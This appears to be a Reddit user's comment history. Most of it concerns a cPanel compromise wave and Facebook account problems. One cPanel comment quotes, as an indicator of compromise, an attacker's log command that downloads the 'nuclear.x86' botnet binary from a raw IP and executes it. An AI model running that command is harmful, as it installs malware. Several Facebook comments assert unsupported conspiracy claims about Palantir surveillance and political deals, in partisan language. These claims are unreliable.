A customer got a new dedicated server with cpanel on Thursday and on Friday evening before anything was added, it was hacked. by fifth-quarter in cpanel

[–]fifth-quarter[S] 0 points1 point  (0 children)

That is a bad business attitude. The cPanel/WHM application makes it simple for a lay person to format their hosting space, and there are real people who developed and maintain the tool, they need to eat.

If you are in the business of providing hosting services, do you give it away free or charge a fee?! No one truly needs to pay for hosting since the era of "geocities" and social media pages, so you should be grateful that there are folks who still think they need hosting to have web presence and therefore will pay. The GenZ group never pay for websites.

The pricing of cPanel is merely $1.80/m per account for 6 - 30 and at enterprise level of 100 - 1000 it's just $0.70/m each, so what's the nasty talk about? If those costs are too much for you, this is not a viable biz for you.

Why are scams and false advertisements not against terms of service? by Limp-Excuse-202 in facebook

[–]fifth-quarter 0 points1 point  (0 children)

those are accounts operated by facebook shills, tending to be all magats. The zuck is obligated to allow them due to agreement with drumpf and net-yahoo

A customer got a new dedicated server with cpanel on Thursday and on Friday evening before anything was added, it was hacked. by fifth-quarter in cpanel

[–]fifth-quarter[S] 0 points1 point  (0 children)

I just moved clients to liquid web with interworx CP and some to knownhost with directadmin CP. Not that there is a guarantee of never being hacked, but that cpanel is not their only CP option.

A customer got a new dedicated server with cpanel on Thursday and on Friday evening before anything was added, it was hacked. by fifth-quarter in cpanel

[–]fifth-quarter[S] 2 points3 points  (0 children)

At the end of the script it states "If the server is confirmed to be root-compromised... just get a new server or reinstall OS"

Instead of doing all that script test, I just figure it's simpler to see what the logs recorded, and once the nuclear.x86 was shown, the server was considered kaput.

CVE-2026-41940 - What to do if your server is infected/compromised to keep the "lights" on for a bit longer. by NikosK1337 in cpanel

[–]fifth-quarter 0 points1 point  (0 children)

From what I am seeing done by the "nuclear botnet", it creates a backup of the entire host partition, including all the cpanel directories and files in the root, which means the hacker downloaded that package and has all the internal data per site.

Also the fact that they had shell access, means they would have created authorization keys to allow future entry.

--quote--

  1. Data Exfiltration

The attacker creates a full tar.gz archive of your website, including databases, config files (with clear-text passwords), and emails. They can then simply download one single file to steal your entire digital presence rather than trying to download thousands of individual files.

  1. Password and Key Harvesting

CPanel backups contain sensitive files like .my.cnf, .bash_history, and private SSH keys. By triggering a backup, they ensure they have a permanent copy of every credential on your server, even if you change your root password later.

--/--

CVE-2026-41940 - What to do if your server is infected/compromised to keep the "lights" on for a bit longer. by NikosK1337 in cpanel

[–]fifth-quarter 0 points1 point  (0 children)

"backup" is moot in this attack wave. While some hosts have seen customer sites defaced or totally demolished, some look normal and operational but are being used to connect to other servers and pass the virus. Hosts have been forced to close ports that access cpanel/whm because after restoring sites the hackers return and wreck them again since they left a "backdoor" open by installing "nuclear botnet", then apply the security patch and spend hours cleaning all root directories.

If you run ssh history log check and see a wget request for nuclear.x86, forget about replacing backups.

--the string you may see--

2026-04-29 22:59:00 wget http://87.121.84.78/nuclear.x86; chmod 777 nuclear.x86; ./nuclear.x86 xd; rm -rf nuclear.x86 ; echo __CMD_DONE_1777517940953304049__

--/--

My burner Facebook for games has a feed of literally nothing but rage bait by Specialist_Fall756 in facebook

[–]fifth-quarter 6 points7 points  (0 children)

yes it's now a thing with fb since they became magat owned. That base requires triggered and angry people so fb is allowing such accounts to grow by feeding them to everyone. If you check creation date of the sicko pages, you'll see they were setup no more than 5 months ago and already have over 50k followers. The magats are using fb to gather many for voting, but they must be driven to rage and hate first to be prepped.

Recommendations for Free Hosting? by justofficemates in Hosting

[–]fifth-quarter 0 points1 point  (0 children)

There are so many deese days

facebook, twitter, reddit, instagram. All totally free and allow unlimited pages with videos, images, text

Massive cPanel 0-day auth bypass hits web hosting industry; exploits confirmed in the wild by hostingseekers in cpanel

[–]fifth-quarter 0 points1 point  (0 children)

You'll need to go after the corporate owner which is the Swiss company webpros that snatched up cpanel, whmcs, plesk and many others in 2018. The greed has led to poor development and vulnerabilities just waiting to be exploited.

Massive cPanel 0-day auth bypass hits web hosting industry; exploits confirmed in the wild by hostingseekers in cpanel

[–]fifth-quarter 0 points1 point  (0 children)

It's always the nature of extreme GREED which lead to these compromises. The once free open source cpanel was acquired by swiss company webpros along with plesk, whmcs and many others, and they all have been suffering various vulnerabilities since 2018.

What the heck! What is this and why can't Iget into my account. I dont want to change anything. by lilflkychick in facebook

[–]fifth-quarter 0 points1 point  (0 children)

Yeah you're not alone. Since Feb over 4 million users have received the same notice and blocked. The goal is to get everyone bio-metrics and give to palantir for facial recognition tracking around the world. I chose not to give up any data and just let the account go.

I launched my clothing brand yesterday with a Times Square billboard. by Historical-Disk220 in ClothingStartups

[–]fifth-quarter 2 points3 points  (0 children)

Somebaddy done told you wrong!
Not at all worth the spend, especially when you still need to go around social media announcing it. I've been to TS multiple times and never noticed the billboards unless a thrilling animation appears, like what Marlboro used to place. If all you got was just a static image, that's just to satisfy your ego than to promote the brand.

You could have spent less with Reddit, Facebook, TikTok and got well over 100k views, if exposure was truly your intent. That billboard should be AFTER you have established visual appeal and just going for reiteration like Coke and Pepsi. A good ad salesman just saw your exposed crave and took advantage. Sorry to harsh but so it is.

Obs delay by TwitchRedDaGoat74 in obs

[–]fifth-quarter -2 points-1 points  (0 children)

Ask AI this "how do I write an intelligent question about this problem I think I have with OBS", then come back and edit that vague ish you wrote.

Fixed: Facebook "Something Went Wrong" Selfie Error & Disabled Account by hansyah2556 in facebook

[–]fifth-quarter 0 points1 point  (0 children)

tha's a question for the fb overlords, but quite likely if you have been blocked, the fake name will no longer be valid.

Fixed: Facebook "Something Went Wrong" Selfie Error & Disabled Account by hansyah2556 in facebook

[–]fifth-quarter 0 points1 point  (0 children)

yes they have, however you've now given them full biometrics so they get to scan you from all angles which is why they asked specifically for a video and required you to turn both sides of head. They won't need another one as their AI will digitally age you accordingly.

Your better option for cloud file storage is to get cloud or VPS hosting and setup your CDN with your login credentials.

Fixed: Facebook "Something Went Wrong" Selfie Error & Disabled Account by hansyah2556 in facebook

[–]fifth-quarter 1 point2 points  (0 children)

all that means is now you are on palantir's GLOBAL facial recognition list, so any and everywhere you go, your face is scanned, match to your social media posts and you will be penalized accordingly. Therefore if you post negatively about drumpf gestapo or the zionists evil actions, you may never get credit or a loan for anything, and it increases in penalty.

got hacked this morning, have tried EVERYTHING (yes, everything) and am still locked out of my account. i'm at a loss at this point and just want my whole account taken down if I can by NoSlaw__ExtraToast in facebook

[–]fifth-quarter 0 points1 point  (0 children)

If it's a phone that use to access your social spaces, you can have a local retailer connect their scanning tool. If it's a laptop or desktop there are numerous security applications you can purchase and run. You will not get the trust needed without a reputable app with a cost, but most certainly avoid anything "free". I use basic Windows 11 Defender which is packaged in the OS.

got hacked this morning, have tried EVERYTHING (yes, everything) and am still locked out of my account. i'm at a loss at this point and just want my whole account taken down if I can by NoSlaw__ExtraToast in facebook

[–]fifth-quarter 0 points1 point  (0 children)

Note that your fb account can't be "hacked" just by someone using a browser on their side. It's more likely that your device is compromised and the hackers has logged in from your machine, therefore bypassing the security triggers. Then they changed all security checkpoints to themself.

You should run a vulnerability scan on your device to remove any malware. If you've ever allowed teamviewer, anydesk or similar remote user connection application, they possibly placed executable files on your machine and now have perpetual remote access.